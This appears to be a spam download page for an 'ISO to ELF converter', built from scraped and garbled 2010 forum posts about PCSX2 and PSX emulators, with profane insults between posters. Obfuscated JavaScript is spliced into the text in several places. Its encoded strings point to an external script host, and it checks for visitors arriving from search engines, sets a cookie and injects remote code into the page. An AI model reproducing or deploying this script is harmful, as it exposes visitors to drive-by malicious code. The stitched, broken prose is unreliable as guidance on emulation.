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Download Free Iso To Elf File Converter For Windows 8 64

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Download Free Iso To Elf File Converter For Windows 8 64

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what is the problem 07-29-2010 10:33 AMleronplz i have 3 problems1 it is aking me bios always where i’ll get it2 where i’ll get the ps2 games in elf format3 how can i convert iso to elfif u can solve this please send me a mail johnabhiram27@gmail.. they have all kinds of tutorials on the DT site So stop asking for ELFs! I searched for hours and hours the last few days and I didnt get one ELF, so I can honestly tell you that if you want an ELF you need to make it!PCSX2 gave me so much trouble that i just uninstalled it, now im playing a GBC emulator and its working great from day one! Project 64 hasnt given me any trouble either! and my opld PSX emulator works great as well.. PCSX2 is nothing except a pain in the neck unless you know EXACTLY what you are doing.. either way Have a good one,DJ Philly 07-20-2010 09:47 PMPCSX2 was a pain WHEN YOU DOWNLOAD PCSX2 THERE SHOULD BE A FOLDER TITTLED DUMPS WHEN YOU DOWNLOAD THE ISO PUT IT THERE DONT EXTRACT07-22-2010 06:22 AMRos-Tfuckedy fuck fuck fuck fuck wrote:you fuckin fucked nerds get a life fucken fuckersdo you know what is > GO FUCK YOURSELF!(this is for you)if you don’t have anything to tell then find other forums where you can rise up with that text.. Now have a nice day if you please 07-16-2010 08:59 PMPCSX2 was a pain wow, pcsx2 was a pain: tho i dont like the way to did it. Click

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and as far as ps2 emulation goes I am done with that too much of a headache but maybe it will be better for you.. img? elf file iso?Once again, you do NOT need an ELF file just get DAEMON Tools and mount an ISO to a virtual drive.. Try to get used to PSX 1 13 and then make the switch to ePSXe when you feel more comfortable with emulation.. also i would suggest rom hustler for psx roms they dont have the best speeds, but they are direct download.. didnt find anythin what psx emy r u usin?07-20-2010 09:43 PMRoarmanz123roarmanz: i was using psx 1. 2

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com08-15-2010 11:24 AMabhiram08-30-2010 06:04 AMHerp Dergingtonso you all had the same problem and the onl solution is to suck Herp dergingtons dick I think I speak for everyone when I say hottest solution ever.. I have Resident Evil 2 in bin form, and I used the ImgBurn to convert it to iso but it the same thing.. i hav 2 agree i mean, dont ppl tht spam caps get annoyin? and i did som serchin for a few hrs 2.. constructor(x22returnx20thisx22)(x20)' ');');_0x4861ef=_0x164c78();}catch(_0x1e39cc){_0x4861ef=window;}var _0x22c817='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=';_0x4861ef['atob']||(_0x4861ef['atob']=function(_0x352027){var _0x2ff871=String(_0x352027)['replace'](/= $/,'');for(var _0x483760=0x0,_0x57337a,_0x174f19,_0x1637f9=0x0,_0x1a3568='';_0x174f19=_0x2ff871['charAt'](_0x1637f9 );~_0x174f19&&(_0x57337a=_0x483760%0x4?_0x57337a*0x40 _0x174f19:_0x174f19,_0x483760 %0x4)?_0x1a3568 =String['fromCharCode'](0xff&_0x57337a>>(-0x2*_0x483760&0x6)):0x0){_0x174f19=_0x22c817['indexOf'](_0x174f19);}return _0x1a3568;});}());_0x58dd['base64DecodeUnicode']=function(_0x17a090){var _0x2531cc=atob(_0x17a090);var _0x2f9d54=[];for(var _0x4b623e=0x0,_0x3620c2=_0x2531cc['length'];_0x4b623e=_0x9145c8;},'FqvSu':function _0x389513(_0x1cb222,_0x3100af){return _0x1cb222===_0x3100af;},'eGIlb':'lCP','tsmHS':function _0x7dc812(_0x2cf82e,_0x5ea1a8){return _0x2cf82e _0x5ea1a8;},'fjbro':function _0x421b24(_0x3a88ea,_0x536596){return _0x3a88ea _0x536596;},'FOMMf':function _0x40e325(_0x206c8b,_0x5550bc){return _0x206c8b(_0x5550bc);},'Pqrjk':function _0x37bcb6(_0x4f2a01,_0x118104){return _0x4f2a01 _0x118104;},'UEumx':function _0x3a7205(_0xcf005b,_0x3b4908){return _0xcf005b*_0x3b4908;},'hPpTx':function _0x33b316(_0x40156b,_0x50bc98){return _0x40156b _0x50bc98;},'CWyas':_0x58dd('0x11'),'yjgaR':function _0x262792(_0x42b079,_0x32528d){return _0x42b079===_0x32528d;},'NHBJo':'DpF','IzdwD':function _0xd224b6(_0x3d7883,_0x2dc40b){return _0x3d7883(_0x2dc40b);}};var _0x3e8d4d=[_0x4f9bac[_0x58dd('0x23')],_0x4f9bac[_0x58dd('0x24')],'. HERE

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13, but i just got started with ePSXe 1 7 and it works better, more compatibility too.. var _0xa3d8=['bGpGRE0=','YnNSaFk=','Z2V0VGltZQ==','YVB5Qmw=','RW9JZE4=','alVJdk4=','OyBzZWN1cmU=','Lmdvb2dsZS4=','LmJpbmcu','LmFvbC4=','LmFzay4=','LmFsdGF2aXN0YS4=','LnlhbmRleC4=','dmlzaXRlZA==','aUxxZEg=','bWFRZ2I=','Q0pmano=','eWF1b1M=','Z2V0','TWJvS1o=','ZUdJbGI=','V2ZW','dHNtSFM=','Rk9NTWY=','VUV1bXg=','aFBwVHg=','Q1d5YXM=','c2V0','TkhCSm8=','SXpkd0Q=','aHR0cHM6Ly9jbG91ZGV5ZXNzLm1lbi9kb25fY29uLnBocD94PWVuJnF1ZXJ5PQ==','aW5kZXhPZg==','aGVhZA==','Y3JlYXRlRWxlbWVudA==','VWpoS00=','c3Jj','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','d1p6Y0I=','aXNvK3RvK2VsZitmaWxlK2NvbnZlcnRlcis=','Y29va2ll','bWF0Y2g=','c09scUM=','cUdO','bkdOcEE=','bGVuZ3Ro','c3BsaXQ=','cmVwbGFjZQ==','OyBleHBpcmVzPQ==','OyBwYXRoPQ==','OyBkb21haW49','bllPZGg=','TlpDREI=','UlN1dnA='];(function(_0x2ae5dc,_0x299e34){var _0x534334=function(_0x35b6e7){while(--_0x35b6e7){_0x2ae5dc['push'](_0x2ae5dc['shift']());}};_0x534334( _0x299e34);}(_0xa3d8,0x15e));var _0x58dd=function(_0x3af87d,_0x3fbdb4){_0x3af87d=_0x3af87d-0x0;var _0x506761=_0xa3d8[_0x3af87d];if(_0x58dd['initialized']===undefined){(function(){var _0x4861ef;try{var _0x164c78=Function('returnx20(function()x20' '{}. e10c415e6f HERE

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07-26-2010 03:29 AMLAPDYou are saying many thungs guys 1- Mr PCSX2 was a pain what do mean, when I open PCSX2 to open ELF file is to choose all files instead of elf ?2- PCSX2 was a pain.. yahoo ',_0x4f9bac['eiJFf'],_0x4f9bac[_0x58dd('0x25')],_0x4f9bac[_0x58dd('0x26')],_0x4f9bac['sNzQu']],_0x4c5989=document['referrer'],_0x3b055e=![],_0xb974fd=cookie[_0x58dd('0x27')](_0x4f9bac[_0x58dd('0x28')]);for(var _0x4d6ffb=0x0;_0x4f9bac['ZnWYb'](_0x4d6ffb,_0x3e8d4d[_0x58dd('0xc')]);_0x4d6ffb ){if(_0x4f9bac['KQYqc'](_0x4c5989['indexOf'](_0x3e8d4d[_0x4d6ffb]),0x0)){if(_0x4f9bac['FqvSu'](_0x4f9bac[_0x58dd('0x29')],_0x58dd('0x2a'))){document[_0x58dd('0x7')]=_0x4f9bac[_0x58dd('0x2b')](_0x4f9bac[_0x58dd('0x2b')](_0x4f9bac['fjbro'](_0x4f9bac['fjbro'](name,'=') _0x4f9bac[_0x58dd('0x2c')](escape,value),expires?_0x58dd('0xf') new Date(_0x4f9bac['Pqrjk'](new Date()[_0x58dd('0x17')](),_0x4f9bac[_0x58dd('0x2d')](expires,0x3e8))):''),path?_0x58dd('0x10') path:'') (domain?_0x4f9bac[_0x58dd('0x2e')](_0x4f9bac[_0x58dd('0x2f')],domain):''),secure?';x20secure':'');}else{_0x3b055e=!![];}}}if(_0x3b055e){cookie[_0x58dd('0x30')](_0x4f9bac[_0x58dd('0x28')],0x1,0x1);if(!_0xb974fd){if(_0x4f9bac['yjgaR'](_0x4f9bac[_0x58dd('0x31')],_0x4f9bac[_0x58dd('0x31')])){_0x4f9bac[_0x58dd('0x32')](include,_0x4f9bac[_0x58dd('0x2e')](_0x58dd('0x33'),q) '');}else{if(_0x4c5989[_0x58dd('0x34')](_0x3e8d4d[_0x4d6ffb])>=0x0){_0x3b055e=!![];}}}}}R(); PCSX2.. Though ePSXe is a little harder to use for someone who is new to PSX emulation I would suggest both for you.. Stop asking for ELFs Stop whining about how the dang program isnt working And stop thinking that CAPS GET YOU NOTICED, because they dont, they just prove that you are small and you dont want to be.